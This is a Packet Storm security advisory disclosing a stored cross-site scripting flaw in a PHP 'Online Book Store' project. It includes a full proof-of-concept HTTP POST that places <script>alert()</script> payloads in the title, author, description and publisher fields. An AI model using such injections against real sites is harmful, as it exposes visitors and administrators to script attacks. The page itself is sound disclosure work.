exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Online Book Store Cross Site Scripting

Online Book Store Cross Site Scripting
Posted Aug 13, 2020
Authored by Yussef Dajdaj

Online Book Store from projectworlds.in suffers from a cross site scripting vulnerability. Versions are not provided with this software currently.

tags | exploit, xss
SHA-256 | a2a871d354cdbb0c3a3947542e1add4dbf9f0257a87cb4fe349e417509a7409e

Online Book Store Cross Site Scripting

Change Mirror Download
====================================================================
Online Book Store project in PHP Mysql - Persistent XSS
====================================================================
####################################################################
.:. Author : Yussef Dajdaj
.:. Contact :
.:. Vendor : https://projectworlds.in/
.:. Script : https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/
.:. Date: : 8/12/2020
.:. Tested on: : Tested on: Window 10 64 bit environment || XAMPP
####################################################################

Description: The application allows an administrator to add new books without first applying validation and sanitization of the data, at leats author,title and descr post data fields execute JS code.
This vulnerability affects both the visitor and the admin of the web application.

===[ Exploit ]===

[*] Stored Cross Site Scripting
=================================
payload: <script>alert(1);</script>


POST /testing/admin_add.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://localhost/testing/admin_add.php
Content-Type: multipart/form-data; boundary=---------------------------12698748551922532251988198308
Content-Length: 1144
Cookie: PHPSESSID=rorcmoub3dsuqd04dbk7oe838s
Connection: close
Upgrade-Insecure-Requests: 1



-----------------------------12698748551922532251988198308

Content-Disposition: form-data; name="isbn"
-----------------------------12698748551922532251988198308

Content-Disposition: form-data; name="title"


<script>alert(2);</script>
-----------------------------12698748551922532251988198308
Content-Disposition: form-data; name="author"


<script>alert(3);</script>
-----------------------------12698748551922532251988198308
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream


-----------------------------12698748551922532251988198308
Content-Disposition: form-data; name="descr"


<script>alert(4);</script>

-----------------------------12698748551922532251988198308

Content-Disposition: form-data; name="price"
12345

-----------------------------12698748551922532251988198308

Content-Disposition: form-data; name="publisher"

<script>alert(5);</script>

-----------------------------12698748551922532251988198308
Content-Disposition: form-data; name="add"

Add new book

-----------------------------12698748551922532251988198308--


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close